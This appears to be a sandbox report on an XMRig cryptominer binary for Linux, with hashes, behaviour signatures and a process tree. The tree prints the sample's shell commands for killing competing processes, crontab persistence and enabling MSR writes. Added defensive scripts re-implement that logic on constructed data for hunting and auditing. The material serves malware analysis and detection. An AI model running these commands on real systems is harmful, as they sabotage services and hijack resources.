Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    ubuntu-20.04_amd64
  • resource
    ubuntu2004-amd64-20240221-en
  • resource tags

    arch:amd64, arch:i386, image:ubuntu2004-amd64-20240221-en, kernel:5.4.0-169-generic, locale:en-us, os:ubuntu-20.04-amd64, system
  • submitted
    19/03/2024, 01:08

General

  • Target

    a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf

  • Size

    2.0MB

  • MD5

    12ffe402a6d5b35160009cfd140ceed6

  • SHA1

    7f21f863f00c9bff182c3044ea225574b02107cf

  • SHA256

    a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be

  • SHA512

    d72e41dd3b346280e3f7a6fdef0031e1203239e9e7bda96cd077c58be36dd270923708adf26090f09ad5d8db1df6b9ceed14336c1284d196ae297b096379b9b8

  • SSDEEP

    49152:Tvdem3S7FxEqg0Y4NIY4cxFrUqIR296CbO:lS5xEqgCGYxxFHe29c

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 1 IoCs
  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information that indicates whether the system is a virtual machine.

  • Checks hardware identifiers (DMI) 1 TTPs 4 IoCs

    Checks DMI information that indicates whether the system is a virtual machine.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads CPU attributes 1 TTPs 5 IoCs
  • Reads hardware information 1 TTPs 14 IoCs

    Accesses system info like serial numbers, manufacturer names etc.

  • Enumerates kernel/hardware configuration 1 TTPs 56 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 3 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
    /tmp/a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
    1⤵
    • Checks CPU configuration
    • Checks hardware identifiers (DMI)
    • Reads CPU attributes
    • Reads hardware information
    • Enumerates kernel/hardware configuration
    • Writes file to tmp directory
    PID:1474
    • /bin/sh
      sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done"
      2⤵
      PID:1476
      • /usr/bin/awk
        awk "/[zZ]/ && !a[\$2]++ {print \$2}"
        3⤵
        PID:1478
      • /usr/bin/ps
        ps -A "-ostat,ppid"
        3⤵
        • Reads CPU attributes
        • Reads runtime system information
        PID:1477
    • /bin/sh
      sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- 'kthreadds[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- 'kthreadds[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
      2⤵
      PID:1483
      • /usr/bin/id
        id -u
        3⤵
        PID:1484
      • /usr/bin/awk
        awk "{if(\$3>30.0) print \$2}"
        3⤵
        PID:1489
      • /usr/bin/grep
        grep -v /usr/sbin/httpd
        3⤵
        PID:1488
      • /usr/bin/grep
        grep -v -- "kthreadds[[:space:]]*\$"
        3⤵
        PID:1487
      • /usr/bin/ps
        ps aux
        3⤵
        • Reads CPU attributes
        • Reads runtime system information
        PID:1485
      • /usr/bin/grep
        grep -v grep
        3⤵
        PID:1486
    • /bin/sh
      sh -c "dir=`pwd 2>/dev/null`;rm -rf \$dir/.cron 2>/dev/null;crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep -v '/tmp/a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf' 2>/dev/null > .cron 2>/dev/null;echo '* * * * * '\$dir/'/tmp/a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf > /dev/null 2>&1;' >> .cron 2>/dev/null; if [ \$(crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep '/tmp/a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf\$' 2>/dev/null | sort 2>/dev/null | uniq 2>/dev/null | wc -l 2>/dev/null) -eq '0' ]; then crontab \$dir/.cron 2>/dev/null; fi;rm -rf \$dir/.cron 2>/dev/null"
      2⤵
      • Writes file to tmp directory
      PID:1493
      • /usr/bin/rm
        rm -rf /tmp/.cron
        3⤵
        PID:1495
      • /usr/bin/grep
        grep -v /tmp/a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf
        3⤵
        PID:1498
      • /usr/bin/grep
        grep -v grep
        3⤵
        PID:1497
      • /usr/bin/crontab
        crontab -l
        3⤵
        PID:1496
      • /usr/bin/crontab
        crontab /tmp/.cron
        3⤵
        • Creates/modifies Cron job
        PID:1506
      • /usr/bin/rm
        rm -rf /tmp/.cron
        3⤵
        PID:1508
    • /bin/sh
      sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- 'kthreadds[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- 'kthreadds[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- 'kthreadds[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- 'kthreadds[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"
      2⤵
      PID:1509
      • /usr/bin/id
        id -u
        3⤵
        PID:1510
  • /usr/bin/grep
    grep "/tmp/a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf\$"
    1⤵
    PID:1502
  • /usr/bin/sort
    sort
    1⤵
    PID:1503
  • /usr/bin/grep
    grep -v grep
    1⤵
    PID:1501
  • /usr/bin/uniq
    uniq
    1⤵
    PID:1504
  • /usr/bin/wc
    wc -l
    1⤵
    PID:1505
  • /usr/bin/crontab
    crontab -l
    1⤵
    PID:1500
  • /usr/bin/wc
    wc -l
    1⤵
    PID:1516
  • /usr/bin/awk
    awk "{if(\$3>30.0) print \$2}"
    1⤵
    PID:1515
  • /usr/bin/grep
    grep -- "kthreadds[[:space:]]*\$"
    1⤵
    PID:1514
  • /usr/bin/grep
    grep -v grep
    1⤵
    PID:1513
  • /usr/bin/ps
    ps aux
    1⤵
    • Reads CPU attributes
    • Reads runtime system information
    PID:1512
  • /bin/sh
    sh -c "/sbin/modprobe msr allow_writes=on > /dev/null 2>&1"
    1⤵
    PID:1562
    • /sbin/modprobe
      /sbin/modprobe msr "allow_writes=on"
      2⤵
      • Enumerates kernel/hardware configuration
      PID:1563
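
The child shells in the tree above do three things besides mining: PID 1476 kills the parent of every zombie process, PID 1483 kills any process using more than 30% CPU unless its command line ends in "kthreadds" or is /usr/sbin/httpd (the "kthreadds" exclusion, one letter off the kernel's own kthreadd, is the strongest hint in the report that the miner runs under that name; this is an inference from the commands, not something the report states), and PID 1562 loads the msr module with allow_writes=on, which is how XMRig prepares to apply its MSR tuning. The script below is an added example, not code from the tria.ge report or from the sample: it re-implements the two victim-selection pipelines over constructed ps output so a responder can see what would be killed on a real host, and adds two hunt checks for the side effects. Function names and the sample listings are hypothetical; the sysfs path for the module parameter is the standard /sys/module/<name>/parameters/<param> location.

```shell
#!/bin/sh
# Added example (not code from the tria.ge report or from the sample): the
# process-selection logic of the sh -c commands in PIDs 1476 and 1483 is
# re-implemented over constructed ps output, followed by two hunt checks for
# the side effects this sample leaves behind. Function names are hypothetical.

# Constructed `ps -A -ostat,ppid` output: two zombies parented by PID 900,
# one parented by PID 1200.
STAT_SAMPLE='STAT  PPID
Ss       0
Z      900
Z      900
S        1
Z+    1200'

# Constructed `ps aux` output: a busy database, a high-CPU httpd worker, the
# real kthreadd (PID 2, shown in brackets because kernel threads have no
# argv), two user processes calling themselves "kthreadds", and a grep.
PS_SAMPLE='USER       PID %CPU %MEM     VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1  169000 11000 ?        Ss   Mar18   0:02 /sbin/init
root         2  0.0  0.0       0     0 ?        S    Mar18   0:00 [kthreadd]
postgres   900 45.2  3.0  512000 98000 ?        Rs   Mar18  12:01 postgres: checkpointer
www-data   955 38.7  0.5   80000 18000 ?        R    Mar18   4:10 /usr/sbin/httpd -k start
user      1474 97.5  1.2 2200000 64000 ?        Rl   01:08   1:30 kthreadds
user      1600 96.0  1.2 2200000 64000 ?        Rl   01:09   0:20 kthreadds
user      1700  2.0  0.1   20000  4000 pts/0    S+   01:10   0:00 grep --color kthreadds'

# PID 1476: the sample kills the *parent* of every zombie (awk matches any
# line whose STAT contains z/Z and prints each PPID once). A service that
# has simply not yet reaped a child gets SIGKILLed.
zombie_parents() {
    awk '/[zZ]/ && !a[$2]++ { print $2 }'
}

# PID 1483: every process above 30% CPU is killed, except the miner itself
# (command ending in "kthreadds"), /usr/sbin/httpd and grep. "$3 + 0" keeps
# the header line out, since "%CPU" + 0 is 0.
competitor_pids() {
    grep -v grep | grep -v -- 'kthreadds[[:space:]]*$' | grep -v /usr/sbin/httpd \
        | awk '$3 + 0 > 30.0 { print $2 }'
}

# Hunt check 1: a process whose whole command line is "kthreadd"/"kthreadds"
# and which is not PID 2 is a user-space impostor (in ps aux the COMMAND
# column starts at field 11, so a bare name means NF == 11).
masquerading_kthreadd() {
    awk 'NR > 1 && NF == 11 && $11 ~ /^kthreadds?$/ && $2 != 2 { print $2 }'
}

# Hunt check 2: PID 1562 runs "modprobe msr allow_writes=on", which XMRig
# does so it can write CPU MSRs through /dev/cpu/*/msr. The live parameter
# is /sys/module/msr/parameters/allow_writes; the directory is an argument so
# the check can be exercised on a copy.
msr_writes_allowed() {
    f="$1/allow_writes"
    [ -r "$f" ] && [ "$(cat "$f")" = "on" ]
}

printf '%s\n' "$STAT_SAMPLE" | zombie_parents        # 900 1200
printf '%s\n' "$PS_SAMPLE" | competitor_pids         # 900
printf '%s\n' "$PS_SAMPLE" | masquerading_kthreadd   # 1474 1600
```

On a live host the hunt checks are `ps aux | masquerading_kthreadd` and `msr_writes_allowed /sys/module/msr/parameters`; the second only says something if the msr module is loaded at all, and on a kernel whose msr module has no allow_writes parameter the file is absent and the check simply fails closed.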

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/.cron

    Filesize

    107B

    MD5

    7e58fd6f14d1f87d2b058d69864a8582

    SHA1

    45e4dfa0ebba4de5c38473ffbc8dbde7eb3bc468

    SHA256

    0d69efac2c18ab0bba2369b1407f6a9e870bdb2f137fd655ad4252244ae7f922

    SHA512

    18bc835ad1b09c31e03efeaa105e6ab1aa402cce685a13c40cad5a80fac8e3aaafd1bacdf14bf4c47d4c8944b0482cc30468f988135aa9814f036f38c0a19ce9

  • /var/spool/cron/crontabs/tmp.HaGeO6

    Filesize

    291B

    MD5

    6bcb97a8c268f5f67c5e30907522f0c7

    SHA1

    92220f7ce62610e5573bb1db15eb360c1b658101

    SHA256

    72d52ced02a4ca6f3492d39400a22799828bd4e6bd50cc4f934527cbaae64d19

    SHA512

    11e26fe77710abd3b972a66c93f623a36608f18d77e12982901dd05621e9f6e093f48a04133cd8c6af8e9b284f13e7fe75158e856409d0eef91eee12fa8e331d
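
The two dropped files above are the cron persistence from PID 1493. The sample builds the entry as `pwd`, a slash, and the path it was started with, so with the binary executed as /tmp/<sha>.elf from /tmp the line it writes is `* * * * * /tmp//tmp/<sha>.elf > /dev/null 2>&1;`, which is exactly 107 bytes, the size reported for /tmp/.cron. That path resolves to /tmp/tmp/<sha>.elf and does not exist, so on this run the every-minute job can never relaunch the miner; the persistence only works when the binary is started by a relative path from its own directory. A second quirk: the "already installed?" test greps for a line ending in the binary path, but the line written ends in `2>&1;`, so the crontab is reinstalled on every run (the preceding `grep -v` keeps it from accumulating). The script below is an added example, not code from the tria.ge report or from the sample: it rebuilds the entry from constructed inputs, reproduces both file sizes (the 291-byte spool file assumes the Debian/Ubuntu crontab(1) header, an assumption about the ubuntu-20.04 image; the install timestamp used is a placeholder), and provides a small crontab audit helper. Function names are hypothetical.

```shell
#!/bin/sh
# Added example (not code from the tria.ge report or from the sample): the
# cron persistence routine of PID 1493 is rebuilt from constructed inputs so
# the two dropped-file sizes in the Downloads section can be reproduced, plus
# a crontab audit helper. Function names are hypothetical.

SAMPLE=a40f89f498d651c969f038327cfac9eac4254eed47ff819e3e5d954c896856be.elf

# The entry the sample writes: `pwd`, a slash, and the path it was started
# with. Started as /tmp/<sha>.elf from /tmp, that yields "/tmp//tmp/<sha>.elf",
# which resolves to /tmp/tmp/<sha>.elf and does not exist.
cron_line() {
    dir=$1
    self=$2
    printf '* * * * * %s/%s > /dev/null 2>&1;\n' "$dir" "$self"
}

# Byte count of stdin, trailing newline included, as wc -c counts it.
byte_len() {
    wc -c | tr -d ' '
}

# What `crontab /tmp/.cron` stores under /var/spool/cron/crontabs/: the
# Debian/Ubuntu crontab(1) header (assumption about the ubuntu-20.04 image;
# the timestamp below is a constructed placeholder, and since ctime() is
# always 24 characters the header length does not depend on it), then the
# file content from stdin.
installed_crontab() {
    printf '# DO NOT EDIT THIS FILE - edit the master and reinstall.\n'
    printf '# (/tmp/.cron installed on %s)\n' 'Tue Mar 19 01:08:00 2024'
    printf '# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)\n'
    cat
}

# Audit helper for `crontab -l` output: flag every-minute entries that run
# something from a world-writable or hidden path, the shape of this entry.
suspicious_cron_entries() {
    grep -E '^\*[[:space:]]+\*[[:space:]]+\*[[:space:]]+\*[[:space:]]+\*[[:space:]]' \
        | grep -E '/tmp/|/var/tmp/|/dev/shm/|/\.[^/[:space:]]+'
}

# Worked check against the report: /tmp/.cron is 107 bytes, the installed
# crontab 291 bytes, and the entry trips the audit helper.
cron_line /tmp "/tmp/$SAMPLE" | byte_len                       # 107
cron_line /tmp "/tmp/$SAMPLE" | installed_crontab | byte_len   # 291
cron_line /tmp "/tmp/$SAMPLE" | suspicious_cron_entries
```

For a fleet check, run `crontab -l -u "$u" 2>/dev/null | suspicious_cron_entries` for every user in /etc/passwd, and remember that a user crontab lives under /var/spool/cron/crontabs/<user>, which is exactly where the second dropped file was written.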